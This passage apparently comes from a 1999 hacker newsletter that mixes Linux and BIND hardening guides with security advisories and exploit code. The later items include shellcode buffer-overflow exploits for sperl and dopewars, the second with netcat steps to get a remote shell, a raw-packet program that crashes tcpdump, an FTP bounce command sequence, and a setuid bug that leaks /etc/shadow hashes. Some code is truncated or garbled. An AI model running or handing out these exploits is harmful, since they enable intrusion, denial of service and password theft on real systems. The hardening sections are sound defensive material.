on-line, you can ftp the rpm and install it at the same time, using the following syntax. rpm -Uvh ftp://updates.redhat.com/5.2/i386/wu-ftpd-2.4.2b18-2.1.i386.rpm Eliminating Services Once you have loaded the installation package, patches, and rebooted, we are now ready to armor the operating system. Armoring consists mainly of turning off services, adding logging, tweaking several files, and configuring TCP Wrappers. First we will begin with turning off services. By default, Linux is a powerful operating system that executes many useful services. However, most of these services are unneeded and pose a potential security risk. The first place to start is /etc/inetd.conf. This file specifies which services the /usr/sbin/inetd daemon will listen for. By default, /etc/inetd.conf is configured for a variety of services, you most likely only need two, ftp and telnet. You eliminate the remaining unnecessary services by commenting them out (example A). This is critical, as many of the services run by inetd pose serious security threats, such as popd, imapd, and rsh. Confirm what you have commented out with the following command (this will show you all the services that were left uncommented) grep -v "^#" /etc/inetd.conf The next place to start are the .rc scripts, these scripts determine what services are started by the init process. For Red Hat, you will find these scripts in /etc/rc.d/rc3.d. To stop a script from starting, replace the capital S with a small s. That way you can easily start the script again just by replacing the small s with a capital S. Or, if you prefer, Red Hat comes with a great utility for turning off these services. Just type "/usr/sbin/setup" at the command prompt, and select "System Services", from there you can select what scripts are started during the boot up process. Another option is chkconfig, which you will find on most distributions. The following startup scripts may be installed by default but are not critical to system functioning. If you don't need them, turn these scripts off. The numbers in the names determine the sequence of initialization, they may vary based on your distribution and version. S05apmd (You only need this script for laptops) S10xntpd (Network time protocol) S15sound S20bootparamd (Used for diskless clients, you probably don't need this vulnerable service) S20nfs (Use for NFS server, do not run unless you absolutely have to). S 20rusersd (Try to avoid running any r services, they provide too much information to remote users). S20rwalld S20rwhod S25innd (News server) S25squid (Proxy server) S30sendmail (You can still send email if you turn this script off, you just will not be able to receive or relay). S30ypbind (Required if you are a NIS client) S34yppasswdd (Required if you are a NIS server, this is an extremely vulnerable service) S35dhcpd S35ypserv (Required if you are a NIS server, this is an extremely vulnerable service) S40portmap (This startup script is required if you have any rpc services, such as NIS or NFS) S40snmpd (SNMP daemon, can give remote users detailed information about your system) S55routed (RIP, don't run this unless you REALLY need it) S55named (DNS server. If you are setting up DNS, upgrade to Bind 8.2, http://www.isc.org/bind.html) S60atd (Used for the at service, similar to cron, by not required by the system) S60lpd (Printing services) S72amd (AutoMount daemon, used to mount remote file systems) S75gated (used to run other routing protocols, such as OSPF) s85httpd (Apache webserver, I recommend you remove the installed version and upgrade to the latest version, http://www.apache.org) S95nfsfs (This is the nfs client, used for mounting filesystems from a nfs server) S95pcmcia (You only need this script for laptops) To see how many services are running before you change the startup scripts, type ps aux | wc - l Once you are done with the installation and have turned off the startup scripts, type the command again and compare how the number of services have decreased. The fewer services running, the better. Logging and Tweaking Once you have eliminated as many services as possible, we want to enable logging. All system logging occurs in /var/log. By default, Linux has excellent logging, except for ftp. You have two options for logging for ftp, configure /etc/ftpaccess file or edit /etc/inetd.conf. I prefer to edit /etc/inetd.conf, as it is simpler (i.e. harder to mess up :). Edit /etc/inetd.conf as follows to ensure full logging of all FTP sessions. ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o --- From the man pages --- If the -l option is specified, each ftp session is logged in the syslog If the -L flag is used, command logging will be on by default as soon as the ftp server is invoked. This will cause the server to log all USER ommands, which if a user accidentally enters a password for that command instead of the username, will cause passwords to be logged via syslog. If the -i option is specified, files received by the ftpd(8) server will be logged to the xferlog(5). If the -o option is specified, files transmitted by the ftpd(8) server will be logged to the xferlog(5). --- snip snip --- Next comes tweaking. This involves various file administration. The first thing we want to do is create the file /etc/issue. This file is an ASCII text banner that appears for all telnet logins (example B). This legal warning will appear whenever someone attempts to login to your system. If you want to continue using the same /etc/issue file, you will have to modify /etc/rc.d/rc3.d/S99local. By default, Linux creates a new /etc/issue file on every reboot. We want to do two things to secure our /etc/passwd file (this is the database file that holds your user accounts and passwords). First, we want to convert our system to use /etc/shadow, this securely stores everyone's password in a file only root can access. This protects your passwords from being easily accessed and cracked (one of the first exploits a hacker looks for). All you have to do is type the following command as root. This automatically converts your encrypted passwords to the /etc/shadow file. Of all the actions you can take to secure your system, I consider this to be one of the most important. pwconv The second step is to remove most of the default system accounts in /etc/passwd. Linux provides these accounts for various system activities which you may not need. If you do not need the accounts, remove them. The more accounts you have, the easier it is to access your system. An example is the "news" account. If you are not running nntp, a news group server, you do not need the account (be sure to update /etc/cron.hourly, as this looks for the user "news"). Also, make sure you remove the "ftp" account, as this is the account used for anonymous ftp. From the man pages. man ftpd: Ftpd authenticates users according to four rules. 4) If the user name is ``anonymous'' or ``ftp'', an anonymous ftp account must be pre-sent in the password file (user ``ftp''). In this case the user is allowed to log in by specifying any password (by convention this is given as the client host's name). For an example of my /etc/passwd file, check out example C. We also want to modify the file /etc/ftpusers (example D). Any account listed in this file cannot ftp to the system. This restricts common system accounts, such as root or bin, from attempting ftp sessions. Linux has the file by default. Ensure that root stays in this file, you never want root to be able to ftp to this system. Ensure that any accounts that need to ftp to the box are NOT in the file /etc/ftpusers. Also, ensure that root cannot telnet to the system. This forces users to login to the system as themselves and then su to root. The file /etc/securetty lists what ttys root can connect to. List only tty1, tty2, etc in this file, this restricts root logins to local access only. ttyp1, ttyp2, are pyseudo terminals, they allow root to telnet to the system remotely (example E). TCP Wrappers TCP Wrappers are a must, no armored system should be without it. Created by Wietse Venema, TCP Wrappers are a binary that wraps itself around inetd services, such as telnet or ftp. With TCP Wrappers, the system launches the wrapper for inetd connections, which logs all attempts and verifies the attempt against a access control list. If the connection is permitted, TCP Wrappers hands the connection to the proper binary, such as telnet. If the connection is rejected by the access control list, then the connection is dropped. Fortunately for us Linux users, TCP Wrappers is already installed, the only thing left for us to do is edit the /etc/hosts.allow and /etc/hosts.deny file. These files determine who can and cannot access our systems. Also, TCP Wrappers allows us to do fancy things, such as banners or spawn additional programs, such as safe_finger. The syntax is relatively simple. Put the IP address or networks in /etc/hosts.allow that you want to permit connections from. Put IP addresses or networks in /etc/hosts.deny that you do not want to permit access. By default, Linux allows connections from everyone, so you will need to modify these files. 2 recommendations when working with TCP Wrappers. 1.Use IP addresses and networks instead of domain names. 2.Set up /etc/hosts.deny to deny everything (ALL), then permit only specific sites with /etc/hosts.allow. For examples on how to setup /etc/hosts.allow and /etc/hosts.deny, see example F. For the Truly Paranoid I consider the measures discussed above absolutely essential. By following these steps, you have greatly improved your system's security, congratulations! Unfortunately, your system is not 100% secure, nor will it ever be. So, for the truly paranoid, I have added some additional steps you can take. First we will create the wheel group. The wheel group is a group of select individuals that can execute powerful commands, such as /bin/su. By limiting the people that can access these commands, you enhance the system security. To create the group, vi the file /etc/group, create the group wheel, and add the system admins to the group. Then identify critical system binaries, such as /bin/su. Change the group ownership to wheel, and the permissions to owner and group executable only (be sure to maintain the suid or guid bit for specific binaries). For /bin/su, the commands would be: /bin/chgrp wheel /bin/su /bin/chmod 4750 /bin/su Second, we will lock down the files .rhosts, .netrc, and /etc/hosts.equiv. The r commands use these files to access systems. To lock them down, touch the files, then change the permissions to zero, locking them down. This way no one can create or alter the files. For example, /bin/touch /.rhosts /.netrc /etc/hosts.equiv /bin/chmod 0 /.rhosts /.netrc /etc/hosts.equiv Third, we make some modifications to PAM. PAM (Pluggable Authentication Modules) is a suite of shared libraries that enable you to choose how applications authenticate users. To learn more about PAM, check out ftp://ftp.us.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html. There are a variety of tweaks that you can make to your system. Here is an example of how to convert your encrypted passwords to use MD5, making your /etc/shadow file far more difficult to crack. Go to /etc/pam.d directory, where you will find all the configuration files for different binaries that require authentication. Most of the configuration files will have the following entry. password required /lib/security/pam_pwdb.so nullok use_authtok All you need to do is find all the configuration files that have this entry, and add "md5" to the end, so it looks like this. password required /lib/security/pam_pwdb.so nullok use_authtok md5 For my RedHat 5.1 system, I had to edit this line in the following configuration files in /etc/pam.d chfn chsh login passwd rlogin su xdm Last thing we can do is protect our system from physical access. This mainly consists of setting up a password for our BIOS. Also, you can password protect your system during boot-up by configuring /etc/lilo.conf with a password (password=xxx) where xxx is your password. However, keep in mind, once someone has physical access to your system, this is no guaranteed way to protect it. Conclusion We have covered some of the more basic steps involved in armoring a Linux box (Red Hat distribution). The key to a secure system is having the minimal software installed, with protection in layers, such as TCP Wrappers. There are many additional steps that can be taken, such as ipchains (firewall software), ssh (encrypted rlogin, rcp, and telnet), tripwire (monitor changes in system binaries), and swatch (automated log monitoring and alerts). Remember, no system is truly 100% secure. However, with the steps outlined above, you greatly reduce the security risks. Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . @HWA 64.0 Securing DNS (Linux version) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There have been a large number of problems with BIND because of the size and complexity of the functions it performs. As a result, a number of attacks (and here ) are beginning to emerge that target this service specifically, some of which can allow full remote access to the target host. Because systems running DNS servers are so critical to the network infrastructure, it is vital that these systems do not get compromised. To further this, I've prepared this short document that describes how to set up your BIND 8.x server in a chroot() environment under RedHat Linux (but should apply to others as well). This document is largely inspired by my friend Adam Shostack and his paper on the identical subject matter (which covers Solaris). Please read his paper (and check out his entire page which contains good reading) after you've been here. NOTE: This is a living document and I expect changes and small errors to be discovered over time. My DNS server is very small and handles a limited number of zones and traffic. It is quite possible that the information I supply here does not work for larger sites. If this is your case please write me and tell me what is broken so I can change it here! Your input will be given full credit and will help everyone who wishes to contain the beast we call BIND. Linux NOTE: Although I do all my development on RedHat Linux, my WWW/SMTP/DNS server is in fact OpenBSD. This document was originally written for OpenBSD usage, but was modified to describe the procedure under Linux (which is only slightly different). Because of this though, I openly admit that I have very little experience running BIND under Linux in a chroot() environment. While I believe the information in this area to be accurate it may in fact vary somewhat from version to version of Linux. If this is the case then please write me and tell me! I would like to make this document as accurate as possible and this can only be done with your help. Step One: Get The Software and Install Go to the ISC FTP Site and download the latest version of BIND (These directions have only been tested on BIND version 8.x, which is the version you should be running anyway). Install the software per the directions included with the package. Go to Obtuse Systems's FTP site where you need to download their free program called: holelogd (and some other neat utilities). This program allows you to create a /dev/log socket under a chroot environment so syslog will work from named once it has been contained. OpenBSD's syslogd already has a feature to do this built in ("syslogd -a /chroot/dev/log"), but Linux does not (however it should). This program will emulate this feature in OpenBSD. Install holelogd per the instructions (usually in /usr/local/sbin). Step Two: Make static named and named-xfer binaries After the build and install you will need to make a statically linked version of the program. This is easily accomplished by going into the directory /src/port/linux under BIND and editing the file Makefile.set. Change the line: 'CDEBUG= -O2 -g' To: 'CDEBUG= -O2 -static' Go to the top of the BIND source directory and do a "make clean" followed by a "make". Go onto the next step where you will copy the files to the chroot() directory. For the uninitiated, a statically linked program is one that does not perform dynamic loading of libraries. For a chroot() environment it means that the executable will be "self-contained" and will not cause an error if you are missing a library file. While it is not necessary to have statically linked files in the chroot() environment, it often makes setup easier. I prefer to have all network daemons statically linked for this reason. Step Three: Make a Directory for BIND Create a directory for BIND to be chroot()ed in. This can be as simple as /chroot/named and will be the "pseudo" root where BIND will reside. The ultra-paranoid may even want to put this chroot jail on a separate physical volume. Under this directory you will need to create the following directory structure: /dev /etc /namedb /usr /sbin /var /run Under each directory you will need to copy the following files and/or perform the following commands: / None /etc copy named.conf from /etc copy localtime from /etc (so named logs correct timezone in syslog) create /etc/group file with named GID as the only entry (Thanks Bernhard Weisshuhn ) /etc/namedb copy all zone databases and files from /etc/namedb /dev mknod ./null c 1 3; chmod 666 null (For other Linux variants, look at /dev/MAKEDEV to get the mknod command) /usr/sbin copy statically linked named and named-xfer binary from the BIND src/bin/named and src/bin/named-xfer directories /var/run None Additionally, Bernhard Weisshuhn , writes that if you have custom logging directories specified that you need to be sure to make these as well (/var/log). Although named won't crash, it will complain. Step Four: Add named user and group Add the user named to the /etc/passwd and to the /etc/group files. This will be the UID/GID that the server runs under. You should now go to the /chroot/named/var/run directory and make it writable by named so the named.pid file can be written to upon startup. This is used by the ndc command to control named's operation. At this point you may want to go into your chroot named area and chown -R named.named on the /etc/namedb directory. This allows named to dump cache and statistical information if you send it the proper signal (kill -INT ). This change should not significantly effect the security of your chroot() setup. Leaving it owned as root won't allow named to write out this information (remember named now runs under a new UID and no longer root), but still allows named to function. A second option is to change the permissions to allow writing to this directory, but leaving it owned by root. This could also work but you need to be careful with doing so to ensure normal users can't modify your named records! IMPORTANT: ** DO NOT USE AN EXISTING UID/GID to run named under (i.e. "nobody"). It is always a bad idea to use an existing UID/GID under a chroot environment as it can impact the protection offered by the service. Make a separate UID/GID for every daemon you run under chroot() as a matter of practice. Step Five: Edit startup scripts Linux uses SYS V style init files and there are several places to put the named commands to run. The cleanest location is in the named init script located in /etc/rc.d/init.d/named. In there you will find a section where named is started. You need to add and change a couple lines. 1) Put in a line before executing named to start up holelogd. holelogd needs to be told where to put the remote socket, this should be your chroot named dev directory made above. It should look something like this: # Start daemons. echo -n "Staring holelogd: " daemon /usr/local/sbin/holelogd /chroot/named/dev/log echo echo -n "Starting named: " daemon named echo touch /var/lock/subsys/named ;; 2) You will also need to change the startup flags for BIND. Version 8.x has a feature where you can change the user and group ID after binding. This is where you specify your UID/GID you assigned to BIND above: # Start daemons. echo -n "Staring holelogd: " daemon /usr/local/sbin/holelogd /chroot/named/dev/log echo echo -n "Starting named: " daemon /chroot/named/usr/sbin/named -u named -g named -t /chroot/named echo touch /var/lock/subsys/named ;; 3) named ships with a script called "ndc" which is used to control named operations. You will need to edit this file and change the location of the variable PIDFILE from /var/run/named.pid to /chroot/named/var/run/named.pid. Step Six: Test it out Start up holelogd by typing: /usr/local/sbin/holelogd /chroot/named/dev/log Go into this directory and ls -al. You should see (the date is insignificant): srw-rw-rw- 1 root wheel 0 Jan 01 12:00 log The "s" bit is set to indicate that the file is a socket. This is how named will write to syslog from within the chroot() jail. Now type: /chroot/named/usr/sbin/named -u named -g named -t /chroot/named If all goes well named will start and your logs will indicate that named is "Ready to answer queries." Perform other DNS tests as appropriate to ensure operation, then reboot your system and verify the setup. BIND should have started and reported it chroot()ed to to directory and changed UID/GID. You can use a program such as lsof to list out the owner of all network sockets on the host. The owner should be your named UID/GID. When everything is working you should either rename /etc/namedb to something like /etc/namedb.orig and chmod 000 /usr/sbin/named to ensure that the old version doesn't get run by mistake. Reboot your system and assuming everything is correct your named will now be chroot()ed. Thanks Thanks to the following people who made suggestions and submitted corrections: Steinar Haug - Comments concerning blocking of TCP to port 53. Bernhard Weisshuhn - Comments pertaining to Linux install (typos, adding /etc/group entry). Marc Heuse - Comments pertaining to logging and renaming of old binaries and directories. Jan Gruber - Comments pertaining to permissions on /chroot/named/var/run and changes to the ndc control script. All Material Copyright ©1996-99 Craig H. Rowland and Psionic Software Systems http://www.psionic.com/misc/contact Site last updated: 1999/03/24 @HWA 65.0 Exploit for FreeBSD sperl4.036 by OVX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za /************************************************************/ /* Exploit for FreeBSD sperl4.036 by OVX */ /************************************************************/ #include #include #include #define BUFFER_SIZE 1400 #define OFFSET 600 char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0+1;i On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters an infinite loop within the procedure ip_print() from file print_ip.c This happens because the header length (ihl) equals '0' and tcpdump tries to print the packet ------------------------------------------------------------------------------ I've tried the bug in diferent OS's Linux: SuSE 6.x: K2.0.36 tcpdump consumes all the system memory K2.2.5 in less than a minute and hangs the system K2.2.9 or sometimes gives an error from the bus K2.3.2 K2.3.5 RedHat 5.2: K2.?.? tcpdump makes a segmentation fault to happen 6.0: K2.2.9 and it sometimes does a coredump Debian: K2.2.? tcpdump makes a segmentation fault to happen and does a coredump Freebsd: Segmentation fault & Coredump Thanks to: wb^3,Cagliostr Solaris: Segmentation fault & Coredump Thanks to: acpizer Aix: ? Hp-UX: ? ----------------------------------------------------------------------------- This tests have been carried out in loopback mode, given that protocol 4 won't get through the routers. It would be interesting to perform the attack remotely in an intranet. But i do not have access to one. ------------------------------------------------------------------------------ Thanks to: the channels: #ayuda_irc, #dune, #linux, #networking, #nova y #seguridad_informática. from irc.irc-hispano.org Special thanks go to: Topo[lb], ^Goku^, Yogurcito, Pixie, Void, S|r_|ce, JiJ79, Unscared etc... Thanks to Piotr Wilkin for the rip base code ;) And big thanks go to TeMpEsT for this translation. ------------------------------------------------------------------------------ I've found two ways of solving the problem Solution 1 execute: tcpdump -s 24 Solution 2 Apply this little patch. diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c *** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997 --- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998 *************** ip_print(register const u_char *bp, regi *** 440,446 **** (void)printf("%s > %s: ", ipaddr_string(&ip->ip_src), ipaddr_string(&ip->ip_dst)); - ip_print(cp, len); if (! vflag) { printf(" (ipip)"); return; --- 440,445 ---- */ #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; char text[15]; } encaps; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(int socket, char *address,int prt) { struct hostent *host; struct sockaddr_in sin; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i,k; int on = 1; struct sockaddr_in addrs; printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n"); if (argc < 3) { printf("Uso: %s \n", argv[0]); exit(-1); } encaps.text[0]=66; encaps.text[1]=76; encaps.text[2]=65; encaps.text[3]=68; encaps.text[4]=73; encaps.text[5]=32; encaps.text[6]=84; encaps.text[7]=90; encaps.text[8]=32; encaps.text[9]=84; encaps.text[10]=79;encaps.text[11]=32; encaps.text[12]=84;encaps.text[13]=79;encaps.text[14]=80;encaps.text[15]=79; sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); addrs = sock_open(sock, argv[2], random() % 255); encaps.iph.version = 0; encaps.iph.ihl = 0; encaps.iph.frag_off = htons(0); encaps.iph.id = htons(0x001); encaps.iph.protocol = 4; encaps.iph.ttl = 146; encaps.iph.tot_len = 6574; encaps.iph.daddr = addrs.sin_addr.s_addr; encaps.iph.saddr = inet_addr(argv[1]); printf ("\t DuMpInG %s ---> %s \n",argv[1],argv[2]); if (sendto(sock, &encaps, 1204, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("Error :(\n"); } fflush(stdout); close(sock); } 67.0 dopewarez.c exploit for Dopewars ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com /* * dopewarez.c - Exploit for dopewars-1.4.4 client/server. Produces a shell. * * URL: http://bellatrix.pcl.ox.ac.uk/~ben/dopewars/ * * C0de by nuuB [Sep 25, 1999]. Linux version. * * 0wn a server: * * (dopewarez [] | nc 7902)& ; sleep 5 ; nc 31337 * * 0wn a client using a bogus server: * * (dopewarez 2285 | nc -l -p 7902) & ; wait4client ; nc 31337 * * Overflow occurs in ProcessMessage(). */ #include #include #include #include #define EGGSIZE 598 #define EIP_OFFSET 208 #define FIRST_OFFSET 236 #define WRD_STACK_OFFSET 0x0bb0 /* approximate for server */ #define OWNED_FIRST 0xbffffffc-132 /* 132 = offset for Player->next */ #define C0DE_SIZE 213 char c0de[]="\xbc\xfc\xff\xff\xbf\xeb\x02\xeb\x0c\xe8\xf9\xff\xff\xff\x2f\x62" "\x69\x6e\x2f\x73\x68\x5d\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80" "\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x31\xdb\x43\x31\xc0\x04\x66" "\xcd\x80\x8d\x64\x24\x0c\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\x7a" "\x69\x04\x02\x66\x50\x89\xe3\x31\xc0\x04\x10\x50\x53\x57\x89\xe1" "\x31\xdb\xb3\x02\x31\xc0\x04\x66\xcd\x80\x85\xc0\x75\x6f\x8d\x64" "\x24\x1c\x31\xc0\x50\x57\x89\xe1\x31\xdb\xb3\x04\x31\xc0\x04\x66" "\xcd\x80\x8d\x64\x24\x08\x31\xc0\x04\x10\x50\x89\xe3\x8d\x64\x24" "\xf0\x89\xe1\x53\x51\x57\x89\xe1\x31\xdb\xb3\x05\x31\xc0\x04\x66" "\xcd\x80\x8d\x64\x24\x20\x89\xc7\x89\xfb\x31\xc9\xb0\x3f\xcd\x80" "\x89\xfb\x31\xc9\x41\xb0\x3f\xcd\x80\x89\xfb\x31\xc9\x80\xc1\x02" "\xb0\x3f\xcd\x80\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45\x0c\x8d" "\x55\x0c\x8d\x4d\x08\x89\xeb\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31" "\xc0\xb0\x01\xcd\x80"; char egg[EGGSIZE+1]; void bail(char *s) { puts(s); exit(1); } char *htol_LEstr(unsigned long num) { static unsigned char buf[5]; unsigned long n; n=htonl(num); buf[0]=(n>>24)&0xff; buf[1]=(n>>16)&0xff; buf[2]=(n>>8)&0xff; buf[3]=n&0xff; buf[4]=0; if(strlen(buf) != 4) bail("NULL detected!"); if(strchr(buf, '^')) bail("caret detected!"); return buf; } int main(int argc, char *argv[]) { unsigned long eip; /* Try to land splat in the middle of the NOPs after FIRST_OFFSET */ eip=(unsigned long)((char *)&eip-WRD_STACK_OFFSET); eip+=FIRST_OFFSET+4+(EGGSIZE-2-FIRST_OFFSET-4-C0DE_SIZE)/2; if(argc >= 2) { if(!strncmp("0x", argv[1], 2)) /* Absolute */ eip=strtoul(argv[1], 0, 0); else eip+=atoi(argv[1]); } fprintf(stderr, "Using EIP=0x%08x\n", eip); memset(egg, 'A', EGGSIZE); strncpy(egg+EIP_OFFSET-2, "\xeb\x04", 2); strncpy(egg+EIP_OFFSET, htol_LEstr(eip), 4); strncpy(egg+FIRST_OFFSET-2, "\xeb\x04", 2); strncpy(egg+FIRST_OFFSET, htol_LEstr(OWNED_FIRST), 4); memcpy(egg+EGGSIZE-2-C0DE_SIZE, c0de, C0DE_SIZE); strcpy(egg+EGGSIZE-2, "^\n"); printf("%s", egg); return 0; } 68.0 Linux forged packets ~~~~~~~~~~~~~~~~~~~~ Date: Sat, 23 Oct 1999 18:34:56 +0200 Reply-To: Pavel Kankovsky The advisory did not explain what was the cause of the problem. (Rant: Why? Will the following explanation help anyone who would not be able to find out this piece of information himself to abuse the bug?) As far as I can tell, the problem is this: anyone, including mere mortals, is allowed to use TIOCSETD. Therefore anyone can set PPP line discipline on a tty under his control and sent forged datagrams right into the kernel network subsystem. I do not believe there is any reason why mortals should ever be allowed to use TIOCSETD (at least under Linux), therefore adding something like "if (!suser()) return -EPERM;" under "case TIOCSETD:" in drivers/char/ tty_io.c should fix the problem for 2.0 (things are a bit more complicated in 2.2 but we've already got a fix for 2.2). But remember: you use it at your own risk, there is no guarantee this patch will not kill all your family when used improperly. --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms] "Resistance is futile. Open your source code and prepare for assimilation." NAME user-rawip-attack AUTHOR Marc SCHAEFER with the help of Alan COX (for the fix) and of Andreas Trottmann for the work-around idea. VERSION $Id: user-raw-IP,v 1.3 1999/10/22 08:33:10 schaefer Exp $ ABSTRACT Forged packets can be send out from a Linux system, for example for NFS attacks or any other protocol relying on addresses for authentification, even when protected from the outside interfaces by firewalling rules. Most of the time, existing firewalling rules are bypassed. This requires at least a shell account on the system. IMPACT Any local user can send any packet to any host from most Linux default installations without of the use of any permission problem or suid flaw. Basically, it corresponds to having write only permissions to raw IP socket on the server machine. IMMUNE CONFIGURATIONS You are immune to this problem if one (or more) of the following is true: - you do not have local (shell) users - SLIP and PPP are not compiled-in the kernel and either are not available in /lib/modules/* as modules, or are never loaded and kerneld/kmod is not available. - you use deny-default configuration for your input firewall rules, and you don't have accept entries for specific addresses or for unused ppp or slip interfaces (and the used ones are never unused or accept rules are safely removed at shutdown). - you use 2.3.18 with ac6 patch (or higher). - you use 2.2.13pre15 (or higher). OPERATING SYSTEMS Linux (any until recently) POSSIBLE-WORK-AROUNDS - Make so that SLIP and PPP support are not available or - Use deny default policy for input firewall, only allow for specific address ranges and specific interfaces. For dynamic links (such as SLIP or PPP), add an accept at link creation time, and remove the entry when the link goes down. FIX - For 2.3.x, install 2.3.18 with the ac6 patch (or higher). Warning, this is a DEVELOPMENT kernel. - For 2.2.x, install 2.2.13pre15 or higher (e.g. 2.2.13). - At this time no fix for 2.0.x. Please apply the above mentionned work-arounds. EXPLOIT Please do not request exploit from the listed authors. Requests for exploits will be ignored. A working exploit exists and has been tested on current Linux distributions. It is possible that an exploit be posted some time in the future (or that someone reads this and does it by himself ...). NOTES This advisory is for information only. No warranty either expressed or implied. Full disclosure and dissemination are allowed as long as this advisory is published in full. No responsability will be taken from abuse or lack of use of the information in this advisory. @HWA 69.0 Nashuatec printer is vulnerable to various attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com hi, The NASHUATEC D445 printer is vulnerabled to many attacks. There are 4 communs services that run in a standard configuration: httpd, ftpd, telnetd, printer. (tested with nmap) I discovered last day, at least three differents ways to attack this kind of boxes. First, it's possible to configure remotly the server via its own admin web server (port 80). Naturaly the server 'll ask u for an admin password before submiting the form to the cgi. The password field is 15 chars length but an intruder with a lightly modified copy of the original form 'll be able to submit many more chars ( about 260 will be enough for the test ) to the cgi and produce a buffer overflow.( see the example below ) The cgi concerned is "reset" but i suppose, every cgi are exposed to this problem. If our intruder decide to forge a special password with instruction code inside he'll force the remote printer to execute code with the target web server priviledge. I don't have, now, all the required informations to gain server priviledge but u may find it here very soon :) Attacker form example: Nashuadeath
NIB 450-E

Unit Serial Number 599132

Reset Unit


A very big password is required to perform this function ( at least 260 chars length ).




[ Home | Unit Info ]
another flaw is present in the ftp daemon that permit the infamous "bounce attack". ftp printer.victim.com user xxxxx pass xxxxx quote port a1,a2,a3,a4,0,25 a1.a2.a3.a4 is every other ip adress. the ftp server doesn't check neither the type of port in the request ( < 1024 = administrative port ) nor the ip adress used. So an intruder may use the service to attack some ohter boxes anonymously. The last one is a denial of service with an icmp redirect storm against the printer ip stack. Use winfreez.c to test it. The printer 'll not respond anymore during the attack. Have a nice day, Gregory Duchemin. ------------------------- NEUROCOM http://www.neurocom.com 179/181 Avenue Charles de Gaulle 92200 Neuilly Sur Seine Tel: 01.41.43.84.84 Fax: 01.41.43.84.80 @HWA 70.0 xmonisdn bug ~~~~~~~~~~~~ http://packetstorm.securify.com From: Ron van Daal Hello, While playing with xmonisdn (included in the isdn4k-utils package), I discovered a little bug. I didn't find anything regarding xmonisdn in the Bugtraq archives, so here's a quick post. I'm wondering if other xmonisdn users can reproduce this exploit. (Tested on my workstation, which is running Red Hat Linux 6.0) [syntonix@damien bin]# pwd; ls -al xmonisdn /usr/bin -rwsr-xr-x 1 root root 13528 Mar 4 1998 xmonisdn [syntonix@damien bin]# xmonisdn -file /etc/shadow Warning: Cannot convert string "netactive" to type Pixmap Warning: Cannot convert string "netactiveout" to type Pixmap Warning: Cannot convert sWarning: Cannot convert string "netstop" to type Pixmap [1]+ Stopped xmonisdn -file /etc/shadow [syntonix@damien bin]# bg [1]+ xmonisdn -file /etc/shadow & [syntonix@damien bin]# killall -8 xmonisdn [1]+ Floating point exception(core dumped) xmonisdn -file /etc/shadow [syntonix@damien bin]# strings core|less /lib/ld-linux.so.2 root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500 bin:*:10878:0:99999:7::: daemon:*:10878:0:99999:7::: adm:*:10878:0:99999:7::: lp:*:10878:0:99999:7::: sync:*:10878:0:99999:7::: shutdown:*:10878:0:99999:7::: halt:*:10878:0:99999:7::: mail:*:10878:0:99999:7::: news:*:108operator:*:10878:0:99999:7::: games:*:10878:0:99999:7::: gopher:*:10878:0:99999:7::: ftp:*:10878:0:99999:7::: nobody:*:10878:0:99999:7::: xfs:!!:10878:0:99999:7::: ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492 syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484 -- Ron van Daal | Syntonic Internet | tel. +31(0)46-4230738 ronvdaal@syntonic.net | www.syntonic.ne @HWA 71.0 Nasty stack smashing bug in Linux-2.2.12 execve 